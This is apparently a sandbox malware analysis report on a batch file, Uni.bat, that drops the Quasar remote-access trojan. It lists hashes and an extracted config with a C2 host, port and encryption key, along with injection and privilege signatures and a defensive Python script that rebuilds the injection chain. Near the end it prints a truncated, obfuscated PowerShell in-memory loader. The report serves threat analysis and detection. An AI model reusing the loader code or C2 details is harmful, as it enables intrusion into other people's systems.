Analysis
-
max time kernel
300s
-
max time network
260s
-
platform
windows10-1703_x64
-
resource
win10-20240404-en
-
resource tags
arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
-
submitted
14-05-2024 20:30
Static task
static1
Behavioral task
behavioral1
Sample
Uni.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Uni.bat
Resource
win10v2004-20240508-en
General
-
Target
Uni.bat
-
Size
513KB
-
MD5
a84be587721ab2558489178539f283e6
-
SHA1
5a48f5c98f7366d13f371965c19c98a5754bd90b
-
SHA256
32cfb4e83f43787c79ef6a15bef53137a0e9a6d6d558ef1532993fb8369cc8fd
-
SHA512
c1c4e35246c39f3e710cbd261187c7968d75c65fd1c4b96f6caa6ddec1484ca42f2431f4184ec0061cd7b2e0d3478db993f88a043106f0ce9d7ae859c3f5f931
-
SSDEEP
12288:PlknMJu9SVaydjmxZ8yeMfd0dwOk6VWX0sQFjh80wszzd0VmONTlomwcuz:q6uidS6MdIdVWksQFjS0bzzOY+oX5z
Malware Config
Extracted
Family
quasar
Version
3.1.5
Botnet
SLAVE
C2
even-lemon.gl.at.ply.gg:33587
Mutex
$Sxr-AidubAN29rBfWYM23w
-
encryption_key
GNF1G2eu7MrbS69M7a4f
-
install_name
Client.exe
-
log_directory
$SXR-LOGS
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
Processes:
resource | yara_rule
behavioral1/memory/3080-200-0x0000000009330000-0x000000000939C000-memory.dmp | family_quasar
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXE, powershell.EXE
description | pid | process | target process
PID 1280 created 584 | 1280 | powershell.EXE | winlogon.exe
PID 4332 created 584 | 4332 | powershell.EXE | winlogon.exe
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exe
flow | pid | process
2 | 3080 | powershell.exe
4 | 3080 | powershell.exe
6 | 3080 | powershell.exe
8 | 3080 | powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exe, powershell.exe, powershell.exe
pid | process
3080 | powershell.exe
4608 | powershell.exe
316 | powershell.exe
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
install.exe, install.exe
pid | process
4084 | install.exe
4232 | install.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
1 | ip-api.com
Drops file in System32 directory 18 IoCs
Processes:
svchost.exe, svchost.exe, powershell.EXE, OfficeClickToRun.exe, powershell.EXE, svchost.exe
description | ioc | process
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | OfficeClickToRun.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83 | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File opened for modification | C:\Windows\System32\Tasks\$77svc64 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | OfficeClickToRun.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | svchost.exe
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXE, powershell.EXE
description | pid | process | target process
PID 1280 set thread context of 1616 | 1280 | powershell.EXE | dllhost.exe
PID 4332 set thread context of 3916 | 4332 | powershell.EXE | dllhost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
OfficeClickToRun.exe, svchost.exe, powershell.EXE, powershell.EXE
description | ioc | process
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 14 May 2024 20:32:05 GMT" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={C2FBEA2B-F513-451D-B832-98713A0C28F0}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715718724" | OfficeClickToRun.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.EXE
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
Modifies registry class 1 IoCs
Processes:
powershell.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000_Classes\Local Settings | powershell.exe
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exe, powershell.exe, powershell.exe, powershell.EXE, dllhost.exe
pid | process | records
4608 | powershell.exe | 3
316 | powershell.exe | 3
3080 | powershell.exe | 4
1280 | powershell.EXE | 4
1616 | dllhost.exe | 50 (the remainder of the 64 listed)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exe, powershell.exe
description | pid | process
Token: SeDebugPrivilege | 4608 | powershell.exe
Token: SeDebugPrivilege | 316 | powershell.exe
The following sequence is then recorded three times in a row for 316 powershell.exe; the list stops at 64 records, so the third pass ends at "Token: 35":
Token: SeIncreaseQuotaPrivilege | 316 | powershell.exe
Token: SeSecurityPrivilege | 316 | powershell.exe
Token: SeTakeOwnershipPrivilege | 316 | powershell.exe
Token: SeLoadDriverPrivilege | 316 | powershell.exe
Token: SeSystemProfilePrivilege | 316 | powershell.exe
Token: SeSystemtimePrivilege | 316 | powershell.exe
Token: SeProfSingleProcessPrivilege | 316 | powershell.exe
Token: SeIncBasePriorityPrivilege | 316 | powershell.exe
Token: SeCreatePagefilePrivilege | 316 | powershell.exe
Token: SeBackupPrivilege | 316 | powershell.exe
Token: SeRestorePrivilege | 316 | powershell.exe
Token: SeShutdownPrivilege | 316 | powershell.exe
Token: SeDebugPrivilege | 316 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 316 | powershell.exe
Token: SeRemoteShutdownPrivilege | 316 | powershell.exe
Token: SeUndockPrivilege | 316 | powershell.exe
Token: SeManageVolumePrivilege | 316 | powershell.exe
Token: 33 | 316 | powershell.exe
Token: 34 | 316 | powershell.exe
Token: 35 | 316 | powershell.exe
Token: 36 | 316 | powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exe
pid | process
3080 | powershell.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exe, powershell.exe, WScript.exe, cmd.exe, powershell.exe, powershell.EXE, dllhost.exe
description | pid | process | target process | records
PID 4924 wrote to memory of 4608 | 4924 | cmd.exe | powershell.exe | 3
PID 4608 wrote to memory of 316 | 4608 | powershell.exe | powershell.exe | 3
PID 4608 wrote to memory of 2524 | 4608 | powershell.exe | WScript.exe | 3
PID 2524 wrote to memory of 1880 | 2524 | WScript.exe | cmd.exe | 3
PID 1880 wrote to memory of 3080 | 1880 | cmd.exe | powershell.exe | 3
PID 3080 wrote to memory of 4084 | 3080 | powershell.exe | install.exe | 3
PID 1280 wrote to memory of 1616 | 1280 | powershell.EXE | dllhost.exe | 8
PID 1616 wrote to memory of 584 | 1616 | dllhost.exe | winlogon.exe | 1
PID 1616 wrote to memory of 636 | 1616 | dllhost.exe | lsass.exe | 1
PID 1616 wrote to memory of 728 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 908 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1004 | 1616 | dllhost.exe | dwm.exe | 1
PID 1616 wrote to memory of 64 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 304 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 380 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1040 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1080 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1100 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1172 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1220 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1304 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1324 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1336 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1416 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1472 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1540 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1564 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1584 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1664 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1680 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1796 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1804 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1868 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1904 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 1536 | 1616 | dllhost.exe | spoolsv.exe | 1
PID 1616 wrote to memory of 1900 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 2060 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 2364 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 2492 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 2536 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 2544 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 2588 | 1616 | dllhost.exe | sihost.exe | 1
PID 1616 wrote to memory of 2632 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 2708 | 1616 | dllhost.exe | svchost.exe | 1
PID 1616 wrote to memory of 2716 | 1616 | dllhost.exe | sysmon.exe | 1
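The memory-write records are easier to read as a graph. The delivery chain is cmd.exe (4924) -> powershell.exe (4608) -> WScript.exe (2524) -> cmd.exe (1880) -> powershell.exe (3080) -> install.exe (4084), with 3080 being the process the Quasar YARA rule fires on. A second writer, powershell.EXE (1280), fills dllhost.exe (1616), which then writes into winlogon.exe, lsass.exe, every svchost.exe, spoolsv.exe, sihost.exe and the sandbox's own sysmon.exe. Read together with the NtCreateUserProcessOtherParentProcess and SetThreadContext signatures (1280 creates dllhost.exe with winlogon.exe 584 as its declared parent and then sets its thread context), this explains why dllhost.exe appears under winlogon.exe in the process tree below even though its memory came from powershell.EXE. The script below is an added example and not part of the report: it parses records in the report's own wording, rebuilds the writer chain that leads to a given PID, and flags writers that spray many processes or touch sensitive ones. SAMPLE_RECORDS is an excerpt of the signature above; the SENSITIVE set and the fan-out threshold are my own choices, not values from the report.

```python
"""Rebuild the injection chain from sandbox 'wrote to memory of' records."""
import re
from collections import defaultdict

# One record as the report prints it:
#   "PID <src> wrote to memory of <dst> <src> <src_name> <dst_name>"
RECORD = re.compile(
    r"PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) (?P=src) "
    r"(?P<src_name>\S+) (?P<dst_name>\S+)"
)

# Excerpt of the records in the signature above (the full signature lists 64).
# Duplicate rows are kept on purpose: the sandbox emits one row per write call.
SAMPLE_RECORDS = """
PID 4924 wrote to memory of 4608 4924 cmd.exe powershell.exe
PID 4924 wrote to memory of 4608 4924 cmd.exe powershell.exe
PID 4924 wrote to memory of 4608 4924 cmd.exe powershell.exe
PID 4608 wrote to memory of 316 4608 powershell.exe powershell.exe
PID 4608 wrote to memory of 2524 4608 powershell.exe WScript.exe
PID 2524 wrote to memory of 1880 2524 WScript.exe cmd.exe
PID 1880 wrote to memory of 3080 1880 cmd.exe powershell.exe
PID 3080 wrote to memory of 4084 3080 powershell.exe install.exe
PID 1280 wrote to memory of 1616 1280 powershell.EXE dllhost.exe
PID 1280 wrote to memory of 1616 1280 powershell.EXE dllhost.exe
PID 1616 wrote to memory of 584 1616 dllhost.exe winlogon.exe
PID 1616 wrote to memory of 636 1616 dllhost.exe lsass.exe
PID 1616 wrote to memory of 728 1616 dllhost.exe svchost.exe
PID 1616 wrote to memory of 1004 1616 dllhost.exe dwm.exe
PID 1616 wrote to memory of 2716 1616 dllhost.exe sysmon.exe
"""

# Names no ordinary loader writes into; one hit is enough to escalate.
# This list is my own choice for the example, not something the report states.
SENSITIVE = {"lsass.exe", "winlogon.exe", "csrss.exe", "services.exe", "sysmon.exe"}


def parse_records(text):
    """Return the distinct (src_pid, src_name, dst_pid, dst_name) edges, in first-seen order."""
    seen, edges = set(), []
    for m in RECORD.finditer(text):
        edge = (int(m["src"]), m["src_name"], int(m["dst"]), m["dst_name"])
        if edge not in seen:
            seen.add(edge)
            edges.append(edge)
    return edges


def build_graph(edges):
    """writer pid -> {target pid: target name}, plus pid -> name for every pid seen."""
    targets, names = defaultdict(dict), {}
    for src, src_name, dst, dst_name in edges:
        targets[src][dst] = dst_name
        names[src], names[dst] = src_name, dst_name
    return targets, names


def chain_to(edges, pid):
    """Walk writers backwards from pid to the root; returns [(pid, name), ...] root first."""
    parent = {dst: src for src, _, dst, _ in edges}  # a loader chain has one writer per target
    _, names = build_graph(edges)
    path = [pid]
    while path[-1] in parent and parent[path[-1]] not in path:  # stop at root or on a cycle
        path.append(parent[path[-1]])
    return [(p, names[p]) for p in reversed(path)]


def suspicious_writers(edges, fanout_threshold=4):
    """Flag writers that spray many distinct processes or write into SENSITIVE ones."""
    targets, names = build_graph(edges)
    hits = {}
    for src, dsts in targets.items():
        reasons = []
        if len(dsts) >= fanout_threshold:
            reasons.append(f"writes into {len(dsts)} distinct processes")
        touched = sorted(set(dsts.values()) & SENSITIVE)
        if touched:
            reasons.append("writes into " + ", ".join(touched))
        if reasons:
            hits[(src, names[src])] = reasons
    return hits


if __name__ == "__main__":
    edges = parse_records(SAMPLE_RECORDS)
    print(" -> ".join(f"{name}({pid})" for pid, name in chain_to(edges, 3080)))
    for (pid, name), reasons in suspicious_writers(edges).items():
        print(f"{name} ({pid}): " + "; ".join(reasons))
```

On the full 64-record signature the same code returns the six-hop delivery chain for 3080 and flags only dllhost.exe (1616), with 38 distinct targets; the triplicated rows collapse, so a fan-out rule counts processes rather than write calls, which is what you want when the writer copies an image in several chunks.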
Processes
-
[1] C:\Windows\system32\winlogon.exe
    command line: winlogon.exe
    [2] C:\Windows\system32\dwm.exe
        command line: "dwm.exe"
    [2] C:\Windows\System32\dllhost.exe
        command line: C:\Windows\System32\dllhost.exe /Processid:{8d270833-923a-46c5-8fa9-68ee0dd04d06}
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of WriteProcessMemory
    [2] C:\Windows\System32\dllhost.exe
        command line: C:\Windows\System32\dllhost.exe /Processid:{f6c7e7a3-fe92-4237-9aa9-a69f62c83af9}
[1] C:\Windows\system32\lsass.exe
    command line: C:\Windows\system32\lsass.exe
[1] c:\windows\system32\svchost.exe
    command line: c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
[1] c:\windows\system32\svchost.exe
    command line: c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
[1] c:\windows\system32\svchost.exe
    command line: c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
[1] c:\windows\system32\svchost.exe
    command line: c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
[1] c:\windows\system32\svchost.exe
    command line: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
[1] c:\windows\system32\svchost.exe
    command line: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
    - Drops file in System32 directory
[1] c:\windows\system32\svchost.exe
    command line: c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    - Drops file in System32 directory
    [2] c:\windows\system32\taskhostw.exe
        command line: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:UrpccseDxPsG{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jQTUterbvHBIxE,[Parameter(Position=1)][Type]$WXxiytiDmU)$nroGedzZSVZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+'dD'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+[Char](109)+'o'+[Char](114)+'y'+'M'+''+[Char](111)+''+'d'+''+'u'+''+'l'+'e',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+''+'g'+''+'a'+''+'t'+''+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+','+'A'+''+'n'+''+'s'+''+'i'+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nroGedzZSVZ.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+'p'+''+'e'+'c'+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$jQTUterbvHBIxE).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$nroGedzZSVZ.DefineMethod('I'+'n'+''+[Char](118)+''+[Char](111)+'k'+'e'+''
